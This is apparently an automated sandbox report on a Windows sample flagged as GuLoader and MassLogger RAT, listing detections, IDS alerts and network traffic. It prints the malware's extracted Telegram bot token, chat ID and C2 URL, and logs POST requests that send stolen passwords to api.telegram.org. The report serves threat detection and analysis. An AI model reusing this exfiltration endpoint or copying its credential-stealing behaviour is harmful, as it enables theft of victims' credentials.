Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xXUnP7uCBJ.exe

Overview

General Information

Sample name:xXUnP7uCBJ.exe
renamed because original name is a hash value
Original sample name:95125d2296df5f467e524ca8978bbe74f0f3ce9520f6014d7a7172b2d7c29f86.exe
Analysis ID:1588130
MD5:37caf3903448f4b7d38a4d8e180f54dd
SHA1:97ce4432b6d1220fad4b622bbefdf8c43d3d02ca
SHA256:95125d2296df5f467e524ca8978bbe74f0f3ce9520f6014d7a7172b2d7c29f86
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • xXUnP7uCBJ.exe (PID: 1608 cmdline: "C:\Users\user\Desktop\xXUnP7uCBJ.exe" MD5: 37CAF3903448F4B7D38A4D8E180F54DD)
    • xXUnP7uCBJ.exe (PID: 5856 cmdline: "C:\Users\user\Desktop\xXUnP7uCBJ.exe" MD5: 37CAF3903448F4B7D38A4D8E180F54DD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2212629078.0000000003E3C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: xXUnP7uCBJ.exe PID: 5856JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:17.793698+010020577441Malware Command and Control Activity Detected192.168.2.849867149.154.167.220443TCP
            2025-01-10T21:41:19.687049+010020577441Malware Command and Control Activity Detected192.168.2.849880149.154.167.220443TCP
            2025-01-10T21:41:21.485754+010020577441Malware Command and Control Activity Detected192.168.2.849891149.154.167.220443TCP
            2025-01-10T21:41:23.161952+010020577441Malware Command and Control Activity Detected192.168.2.849904149.154.167.220443TCP
            2025-01-10T21:41:24.917668+010020577441Malware Command and Control Activity Detected192.168.2.849917149.154.167.220443TCP
            2025-01-10T21:41:26.614738+010020577441Malware Command and Control Activity Detected192.168.2.849929149.154.167.220443TCP
            2025-01-10T21:41:28.223995+010020577441Malware Command and Control Activity Detected192.168.2.849942149.154.167.220443TCP
            2025-01-10T21:41:30.314610+010020577441Malware Command and Control Activity Detected192.168.2.849955149.154.167.220443TCP
            2025-01-10T21:41:31.879631+010020577441Malware Command and Control Activity Detected192.168.2.849965149.154.167.220443TCP
            2025-01-10T21:41:33.495391+010020577441Malware Command and Control Activity Detected192.168.2.849977149.154.167.220443TCP
            2025-01-10T21:41:35.188701+010020577441Malware Command and Control Activity Detected192.168.2.849989149.154.167.220443TCP
            2025-01-10T21:41:36.757896+010020577441Malware Command and Control Activity Detected192.168.2.850001149.154.167.220443TCP
            2025-01-10T21:41:38.364189+010020577441Malware Command and Control Activity Detected192.168.2.850006149.154.167.220443TCP
            2025-01-10T21:41:40.055332+010020577441Malware Command and Control Activity Detected192.168.2.850008149.154.167.220443TCP
            2025-01-10T21:41:41.697330+010020577441Malware Command and Control Activity Detected192.168.2.850010149.154.167.220443TCP
            2025-01-10T21:41:43.436345+010020577441Malware Command and Control Activity Detected192.168.2.850012149.154.167.220443TCP
            2025-01-10T21:41:45.015846+010020577441Malware Command and Control Activity Detected192.168.2.850014149.154.167.220443TCP
            2025-01-10T21:41:47.639350+010020577441Malware Command and Control Activity Detected192.168.2.850016149.154.167.220443TCP
            2025-01-10T21:41:49.349565+010020577441Malware Command and Control Activity Detected192.168.2.850018149.154.167.220443TCP
            2025-01-10T21:41:50.928807+010020577441Malware Command and Control Activity Detected192.168.2.850020149.154.167.220443TCP
            2025-01-10T21:41:52.471215+010020577441Malware Command and Control Activity Detected192.168.2.850022149.154.167.220443TCP
            2025-01-10T21:41:53.992976+010020577441Malware Command and Control Activity Detected192.168.2.850024149.154.167.220443TCP
            2025-01-10T21:41:55.601059+010020577441Malware Command and Control Activity Detected192.168.2.850026149.154.167.220443TCP
            2025-01-10T21:41:57.166640+010020577441Malware Command and Control Activity Detected192.168.2.850028149.154.167.220443TCP
            2025-01-10T21:41:58.844952+010020577441Malware Command and Control Activity Detected192.168.2.850030149.154.167.220443TCP
            2025-01-10T21:42:00.554468+010020577441Malware Command and Control Activity Detected192.168.2.850032149.154.167.220443TCP
            2025-01-10T21:42:02.309175+010020577441Malware Command and Control Activity Detected192.168.2.850034149.154.167.220443TCP
            2025-01-10T21:42:03.939152+010020577441Malware Command and Control Activity Detected192.168.2.850036149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:09.855799+010028032742Potentially Bad Traffic192.168.2.849819193.122.6.16880TCP
            2025-01-10T21:41:16.746397+010028032742Potentially Bad Traffic192.168.2.849819193.122.6.16880TCP
            2025-01-10T21:41:18.668334+010028032742Potentially Bad Traffic192.168.2.849875193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:04.978467+010028032702Potentially Bad Traffic192.168.2.849785142.250.181.238443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:17.415525+010018100081Potentially Bad Traffic192.168.2.849867149.154.167.220443TCP
            2025-01-10T21:41:19.224861+010018100081Potentially Bad Traffic192.168.2.849880149.154.167.220443TCP
            2025-01-10T21:41:21.006084+010018100081Potentially Bad Traffic192.168.2.849891149.154.167.220443TCP
            2025-01-10T21:41:22.756876+010018100081Potentially Bad Traffic192.168.2.849904149.154.167.220443TCP
            2025-01-10T21:41:24.655050+010018100081Potentially Bad Traffic192.168.2.849917149.154.167.220443TCP
            2025-01-10T21:41:26.262843+010018100081Potentially Bad Traffic192.168.2.849929149.154.167.220443TCP
            2025-01-10T21:41:27.913903+010018100081Potentially Bad Traffic192.168.2.849942149.154.167.220443TCP
            2025-01-10T21:41:29.890487+010018100081Potentially Bad Traffic192.168.2.849955149.154.167.220443TCP
            2025-01-10T21:41:31.567980+010018100081Potentially Bad Traffic192.168.2.849965149.154.167.220443TCP
            2025-01-10T21:41:33.138548+010018100081Potentially Bad Traffic192.168.2.849977149.154.167.220443TCP
            2025-01-10T21:41:34.875730+010018100081Potentially Bad Traffic192.168.2.849989149.154.167.220443TCP
            2025-01-10T21:41:36.530641+010018100081Potentially Bad Traffic192.168.2.850001149.154.167.220443TCP
            2025-01-10T21:41:38.043435+010018100081Potentially Bad Traffic192.168.2.850006149.154.167.220443TCP
            2025-01-10T21:41:39.657095+010018100081Potentially Bad Traffic192.168.2.850008149.154.167.220443TCP
            2025-01-10T21:41:41.352591+010018100081Potentially Bad Traffic192.168.2.850010149.154.167.220443TCP
            2025-01-10T21:41:43.109284+010018100081Potentially Bad Traffic192.168.2.850012149.154.167.220443TCP
            2025-01-10T21:41:44.746178+010018100081Potentially Bad Traffic192.168.2.850014149.154.167.220443TCP
            2025-01-10T21:41:46.294566+010018100081Potentially Bad Traffic192.168.2.850016149.154.167.220443TCP
            2025-01-10T21:41:48.959134+010018100081Potentially Bad Traffic192.168.2.850018149.154.167.220443TCP
            2025-01-10T21:41:50.630293+010018100081Potentially Bad Traffic192.168.2.850020149.154.167.220443TCP
            2025-01-10T21:41:52.194413+010018100081Potentially Bad Traffic192.168.2.850022149.154.167.220443TCP
            2025-01-10T21:41:53.768230+010018100081Potentially Bad Traffic192.168.2.850024149.154.167.220443TCP
            2025-01-10T21:41:55.294687+010018100081Potentially Bad Traffic192.168.2.850026149.154.167.220443TCP
            2025-01-10T21:41:56.863743+010018100081Potentially Bad Traffic192.168.2.850028149.154.167.220443TCP
            2025-01-10T21:41:58.487650+010018100081Potentially Bad Traffic192.168.2.850030149.154.167.220443TCP
            2025-01-10T21:42:00.308605+010018100081Potentially Bad Traffic192.168.2.850032149.154.167.220443TCP
            2025-01-10T21:42:01.891414+010018100081Potentially Bad Traffic192.168.2.850034149.154.167.220443TCP
            2025-01-10T21:42:03.586916+010018100081Potentially Bad Traffic192.168.2.850036149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: xXUnP7uCBJ.exeAvira: detected
            Source: 00000005.00000002.2980898260.000000003682B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
            Source: xXUnP7uCBJ.exe.5856.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
            Source: xXUnP7uCBJ.exeVirustotal: Detection: 57%Perma Link
            Source: xXUnP7uCBJ.exeReversingLabs: Detection: 57%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCD1EC CryptUnprotectData,5_2_38FCD1EC
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_38FCD9D9 CryptUnprotectData,5_2_38FCD9D9
            Source: xXUnP7uCBJ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49828 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.8:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.8:49794 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49867 version: TLS 1.2
            Source: xXUnP7uCBJ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_0040672B FindFirstFileW,FindClose,5_2_0040672B
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 5_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405AFA
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FC0671h5_2_38FC03AF
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FC1042h5_2_38FC0C28
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FCC985h5_2_38FCC638
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FCB339h5_2_38FCB07F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FCF2F8h5_2_38FCF054
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FCC499h5_2_38FCC1F2
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FCBBE9h5_2_38FCB930
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FCDD40h5_2_38FCDA89
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FCEEA0h5_2_38FCEBF2
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FCE5F0h5_2_38FCE339
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FCB791h5_2_38FCB4EC
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FC1042h5_2_38FC0C1A
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FCC041h5_2_38FCBD9C
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FCE198h5_2_38FCDEE1
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FCEA48h5_2_38FCE790
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 38FC1042h5_2_38FC0F6F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then push 00000000h5_2_3956BDF0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 3956882Dh5_2_39568650
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 395691B7h5_2_39568650
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 395623B0h5_2_39562108
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then push 00000000h5_2_3956C92F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_39568193
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39562C60h5_2_395629B8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39561B00h5_2_39561858
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39567318h5_2_39567070
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39564ACAh5_2_39564820
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_39567B4F
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_39568373
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39566610h5_2_39566368
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39563DC0h5_2_39563B18
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39564670h5_2_395643C8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_3956CBE7
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39563510h5_2_39563268
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 395654B0h5_2_39565208
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39565D60h5_2_39565AB8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39562808h5_2_39562560
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39565058h5_2_39564DB0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39566EC0h5_2_39566C18
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 395616A8h5_2_39561400
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39567770h5_2_395674C8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39561F58h5_2_39561CB0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39564218h5_2_39563F70
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 395661B8h5_2_39565F10
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39566A68h5_2_395667C0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39561250h5_2_39560FA8
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39565908h5_2_39565660
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 395630B8h5_2_39562E10
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then jmp 39563968h5_2_395636C0
            Source: C:\Users\user\Desktop\xXUnP7uCBJ.exeCode function: 4x nop then push 00000000h5_2_39A9E7C8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49891 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49891 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49867 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49867 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49904 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49904 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49929 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49929 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49965 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49965 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49977 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49977 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49942 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49942 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50016 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50024 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50018 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49989 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49989 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50001 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50001 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50036 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50036 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50012 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50012 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50020 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50010 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50020 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50010 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49955 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49880 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49955 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49880 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49917 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49917 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:50034 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:50034 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318d382f37f4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a2245053c6Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31b700ceb690Host: api.telegram.orgContent-Length: 1090
